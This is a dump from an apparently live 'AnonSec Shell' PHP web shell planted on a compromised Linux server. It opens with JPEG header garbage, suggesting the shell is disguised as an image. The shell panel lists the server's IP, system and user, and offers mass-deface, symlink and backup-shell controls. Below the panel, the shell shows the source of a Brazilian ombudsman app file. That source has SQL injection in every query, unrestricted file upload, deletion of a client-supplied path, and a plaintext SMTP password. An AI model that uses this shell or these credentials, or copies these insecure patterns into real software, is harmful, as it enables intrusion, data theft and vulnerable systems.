JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/siac/dev/admin/pages/solicitacao/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/siac/dev/admin/pages/solicitacao/solicitacao_a.php
<?php
    /**
     * Copyright (c) 2017.
     * O sistema está protegido por copyright.
     * Todo o copyright ou outros direitos de propriedade intelectual presentes no sistema, imagens, som, software e outros conteúdos do site são propriedade de Ralp Alves
     * Bezerra.
     * É permitida a pesquisa no sistema e a reprodução de excertos através de impressão ou distribuição para outras pessoas, mas em todos os casos para fins não comerciais.
     * Apenas é permitido o uso dos conteúdos do sistema para utilização pessoal. Nenhuma parte do sistema poderá ser reproduzida para ser vendida ou distribuída para ganhos
     * comerciais nem poderá ser modificada ou incorporada em qualquer outro trabalho, publicação ou site tanto no formato electrónico, como transferência para qualquer outro
     * site. Nenhuma outra licença ou direitos relacionados com o site são concedidos, sem autorização expressa do autor.
     */
    
    /**
     * Created by PhpStorm.
     * User: ralpb
     * Date: 06/03/2021
     * Time: 00:46
     */
    error_reporting(E_ALL);
    ini_set('display_errors', '1');
    
    use PHPMailer\PHPMailer\PHPMailer;
    //$mail = new PHPMailer(true);
    
    
    $acao = $_POST['var'];
    
    $dddtelefone = $_POST['dddtelefone'];
    $telefone    = $_POST['telefone'];
    
    
    function somar_dias_uteis($str_data, $int_qtd_dias_somar = 7)
    {
        $str_data = substr($str_data, 0, 10);
        if (preg_match("@/@", $str_data)==1) {
            $str_data = implode("-", array_reverse(explode("/", $str_data)));
        }
        $array_data         = explode('-', $str_data);
        $count_days         = 0;
        $int_qtd_dias_uteis = 0;
        while ($int_qtd_dias_uteis < $int_qtd_dias_somar) {
            $count_days++;
            if (($dias_da_semana = gmdate('w', strtotime('+' . $count_days . ' day', mktime(0, 0, 0, $array_data[1], $array_data[2], $array_data[0]))))!='0' && $dias_da_semana!='6') {
                $int_qtd_dias_uteis++;
            }
        }
        return gmdate('d/m/Y', strtotime('+' . $count_days . ' day', strtotime($str_data)));
    }
    
    if ($acao=='editar') {
        //$prazo_data           = somar_dias_uteis(date('Y-m-d H:i'), $cfg->prazoresposta);
        //$dataprevisaoresposta = date("Y-m-d", strtotime(str_replace('/', '-', $prazo_data)));
        
        $idsolicitacao        = $_POST['idsolicitacao'];
        $idsolicitante        = $_POST['idsolicitante'];
        $id_modulo            = $_POST['id_modulo'];
        $idtiposolicitacao    = $_POST['idtiposolicitacao'];
        $textosolicitacao     = $_POST['textosolicitacao'];
        $idsecretariaresposta = $_POST['idsecretariaresposta'];
        try {
            $grava = $conn->prepare("UPDATE sol_solicitacao SET
                               idtiposolicitacao = '$idtiposolicitacao',
                               id_modulo = '$id_modulo', textosolicitacao ='$textosolicitacao', idsecretariaresposta ='$idsecretariaresposta'
                            WHERE idsolicitacao = '$idsolicitacao'");
            $grava->execute();
            $a->avisoSucesso('?page=solicitacao/solicitacao_e&idsolicitacao=' . $idsolicitacao . '&idsolicitante=' . $idsolicitante, 'Gravado com sucesso!', 'E - SIC / Ouvidoria');
        } catch (PDOException $e) {
            $a->avisoErro('?page=solicitacao/solicitacao_e', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
        
    }
    
    if ($acao=='add_file') {
        $idsolicitacao = $_POST['idsolicitacao'];
        $idsolicitante = $_POST['idsolicitante'];
        $descricao     = $_POST['descricao'];
        $uploaddir     = 'admin/files/sol/';
        $caminho       = $_FILES['caminho']['name'];
        $extensao      = strrchr($caminho, '.');
        $extensao      = strtolower($extensao);
        $tipo          = substr($extensao, 1);
        $caminho       = $idsolicitacao . '-' . rand(1, 1000000000000000000) . $extensao;
        $uploadfile    = $uploaddir . basename($caminho);
        move_uploaded_file($_FILES['caminho']['tmp_name'], $uploadfile);
        
        try {
            $grava = $conn->prepare("INSERT INTO sol_anexo
                                                (idsolicitacao, descricao, caminho,
                                                 tipo)
                                                VALUES
                                                ('$idsolicitacao','$descricao','$uploaddir$caminho',
                                                 '$tipo')");
            $grava->execute();
        } catch (PDOException $e) {
            $a->avisoErro('?page=solicitacao/solicitacao_g', '<strong>' . $e->getMessage() . '</strong>', 'Problema no registro');
        }
        //$a->enviosms('+55' . $dddtelefone . $telefone, 'SIAC Ouvidoria-Anexo adicionado a resosta! Protocolo: ' . $numprotocolo);
        $a->avisoSucesso('?page=solicitacao/solicitacao_e&idsolicitacao=' . $idsolicitacao . '&idsolicitante=' . $idsolicitante, 'Gravado com sucesso!', 'SIAC');
    }
    
    if ($acao=='del_anexo') {
        $id_anexo      = $_GET['id_anexo'];
        $idsolicitacao = $_GET['idsolicitacao'];
        $idsolicitante = $_GET['idsolicitante'];
        $caminho       = $_GET['caminho'];
        
        try {
            //$a->avisoExcluir('?page=solicitacao/solicitacao_e&idsolicitacao=' . $idsolicitacao . '&idsolicitante=' . $idsolicitante, 'Deseja realmente excluir o anexo ?', 'Exclusão de registro', '?page=solicitacao/solicitacao_a&var=del_anexo&cod_anexo=' . $cod_anexo . '&cod_Ouvidoria=' . $cod_Ouvidoria . '&caminho=' . $caminho);
            unlink($caminho);
            $grava = $conn->prepare("delete from sol_anexo where id_anexo='$id_anexo'");
            $grava->execute();
        } catch (PDOException $e) {
            $a->avisoErro('?page=solicitacao/solicitacao_e&idsolicitacao=' . $idsolicitacao . '&idsolicitante=' . $idsolicitante, '<strong>' . $e->getMessage() . '</strong>', 'Problema no registro');
        }
        $a->avisoSucesso('?page=solicitacao/solicitacao_e&idsolicitacao=' . $idsolicitacao . '&idsolicitante=' . $idsolicitante, 'Excluído com sucesso!', 'SIAC');
    }
    
    if ($acao=='respostar') {
        $idsolicitacao        = $_POST['idsolicitacao'];
        $idsolicitante        = $_POST['idsolicitante'];
        $idusuarioresposta    = $_POST['idusuarioresposta'];
        $situacao             = $_POST['situacao'];
        $dataresposta         = date('Y-m-d H:i:s');
        $idsecretariaresposta = $_POST['idsecretariaresposta'];
        $resposta             = $_POST['resposta'];
        $numprotocolo         = $_POST['numprotocolo'];
        
        $dddtelefone = $_POST['dddtelefone'];
        $telefone    = $_POST['telefone'];
        echo $nome        = $_POST['nome'];
        echo $email       = $_POST['email'];
        try {
            $grava = $conn->prepare("UPDATE sol_solicitacao SET
                               idusuarioresposta = '$idusuarioresposta',
                               situacao = '$situacao', dataresposta ='$dataresposta',
                               idsecretariaresposta ='$idsecretariaresposta',
                               resposta ='$resposta'
                            WHERE idsolicitacao = '$idsolicitacao'");
            $grava->execute();
            $a->avisoSucesso('?page=solicitacao/resposta&idsolicitacao=' . $idsolicitacao . '&idsolicitante=' . $idsolicitante, 'Gravado com sucesso!', 'E - SIC / Ouvidoria');
            //$a->enviosms('+55' . $dddtelefone . $telefone, 'SIAC Ouvidoria-Solicitacao respondida! Protocolo: ' . $idsolicitacao);
            
            //PHPmailer
            try {
                //Server settings
                $mail->isSMTP();                                            //Send using SMTP
                $mail->Host       = 'mail.tnssolucoes.com.br';                     //Set the SMTP server to send through
                $mail->SMTPAuth   = true;                                   //Enable SMTP authentication
                $mail->Username   = 'siac@tnssolucoes.com.br';                     //SMTP username
                $mail->Password   = 'Siac2022@';                               //SMTP password
                $mail->SMTPSecure = PHPMailer::ENCRYPTION_SMTPS;            //Enable implicit TLS encryption
                $mail->Port       = 465;                                    //TCP port to connect to; use 587 if you have set `SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS`
                
                //Recipients
                $mail->setFrom('siac@tnssolucoes.com.br', 'SIAC');
                $mail->addAddress($email, $nome);     //Add a recipient
                //$mail->addReplyTo('info@example.com', 'Information');
                //$mail->addCC('cc@example.com');
                //$mail->addBCC('bcc@example.com');
                //Attachments
                //$mail->addAttachment('/var/tmp/file.tar.gz');         //Add attachments
                //$mail->addAttachment('/tmp/image.jpg', 'new.jpg');    //Optional name
                //Content
                $mail->isHTML(true);                                  //Set email format to HTML
                $mail->Subject = 'SIAC - Movimentacao de Informacoes';
                $mail->Body    = $sol->nome . '<p></p>' . ' SIAC Ouvidoria-Sua solicitacao foi respondida por ' . $_login . '! Protocolo: ' . $idsolicitacao;
                $mail->AltBody = 'Houve uma movimentacao <b>em sua solicitacao!</b>';
                $mail->send();
                echo '';
            } catch (Exception $e) {
                echo "A mensagem não pôde ser enviada. Erro de correspondência: {$mail->ErrorInfo}";
            }
            //PHPmailer
        } catch (PDOException $e) {
            $a->avisoErro('?page=solicitacao/solicitacao_e', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    
    if ($acao=='add_file_resp') {
        $idsolicitacao = $_POST['idsolicitacao'];
        $idsolicitante = $_POST['idsolicitante'];
        $descricao     = $_POST['descricao'] . '-resp';
        $uploaddir     = '../admin/files/sol/';
        $uploaddirb    = 'admin/files/sol/';
        $caminho       = $_FILES['caminho']['name'];
        $extensao      = strrchr($caminho, '.');
        $extensao      = strtolower($extensao);
        $tipo          = substr($extensao, 1);
        $caminho       = $idsolicitacao . '-' . rand(1, 1000000000000000000) . $extensao;
        $uploadfile    = $uploaddir . basename($caminho);
        $uploadfileb   = $uploaddirb . basename($caminho);
        move_uploaded_file($_FILES['caminho']['tmp_name'], $uploadfile);
        
        try {
            $grava = $conn->prepare("INSERT INTO sol_anexo
                                                (idsolicitacao, descricao, caminho,
                                                 tipo)
                                                VALUES
                                                ('$idsolicitacao','$descricao','$uploaddirb$caminho',
                                                 '$tipo')");
            $grava->execute();
            //$a->enviosms('+55' . $dddtelefone . $telefone, 'SIAC Ouvidoria-Anexo adicionado a resposta! Protocolo: ' . $idsolicitacao);
            $a->avisoSucesso('?page=solicitacao/anexo&idsolicitacao=' . $idsolicitacao . '&idsolicitante=' . $idsolicitante, 'Gravado com sucesso!', 'SIAC');
        } catch (PDOException $e) {
            $a->avisoErro('?page=solicitacao/solicitacao_g', '<strong>' . $e->getMessage() . '</strong>', 'Problema no registro');
        }
        
    }
    
    if ($acao=='prorrogar') {
        $idsolicitacao        = $_POST['idsolicitacao'];
        $idsolicitante        = $_POST['idsolicitante'];
        $idusuarioprorrogacao = $_POST['idusuarioprorrogacao'];
        $situacao             = 'P';
        $dataprorrogacao      = date('Y-m-d', strtotime($_POST['dataprorrogacao']));
        $motivoprorrogacao    = $_POST['motivoprorrogacao'];
        $nome                 = $_POST['nome'];
        try {
            $grava = $conn->prepare("UPDATE sol_solicitacao SET
                               idusuarioprorrogacao = '$idusuarioprorrogacao',
                               situacao = '$situacao', dataprorrogacao ='$dataprorrogacao',
                               motivoprorrogacao ='$motivoprorrogacao'
                            WHERE idsolicitacao = '$idsolicitacao'");
            $grava->execute();
            //$a->enviosms('+55' . $dddtelefone . $telefone, 'SIAC Ouvidoria-Solicitacao prorrogada! Protocolo: ' . $idsolicitacao);
            $a->avisoSucesso('?page=solicitacao/solicitacao_e&idsolicitacao=' . $idsolicitacao . '&idsolicitante=' . $idsolicitante, 'Gravado com sucesso!', 'E - SIC / Ouvidoria');
        } catch (PDOException $e) {
            $a->avisoErro('?page=solicitacao/solicitacao_e', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
        
    }
    if ($acao=='negativa') {
        $idsolicitacao     = $_POST['idsolicitacao'];
        $idsolicitante     = $_POST['idsolicitante'];
        $idusuarioresposta = $_POST['idusuarioresposta'];
        $resposta          = $_POST['resposta'];
        $situacao          = 'N';
        $dataresposta      = date('Y-m-d H:i:s');
        $nome              = $_POST['nome'];
        try {
            $grava = $conn->prepare("UPDATE sol_solicitacao SET
                               situacao = '$situacao',
                               resposta ='$resposta',
                               dataresposta ='$dataresposta'
                            WHERE idsolicitacao = '$idsolicitacao'");
            $grava->execute();
            //$a->enviosms('+55' . $dddtelefone . $telefone, 'SIAC Ouvidoria-Sua Solicitacao teve uma negativa! Protocolo: ' . $idsolicitacao);
            $a->avisoSucesso('?page=solicitacao/solicitacao_e&idsolicitacao=' . $idsolicitacao . '&idsolicitante=' . $idsolicitante, 'Gravado com sucesso!', 'E - SIC / Ouvidoria');
        } catch (PDOException $e) {
            $a->avisoErro('?page=solicitacao/solicitacao_e', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
        
    }
?>

Anon7 - 2022
AnonSec Team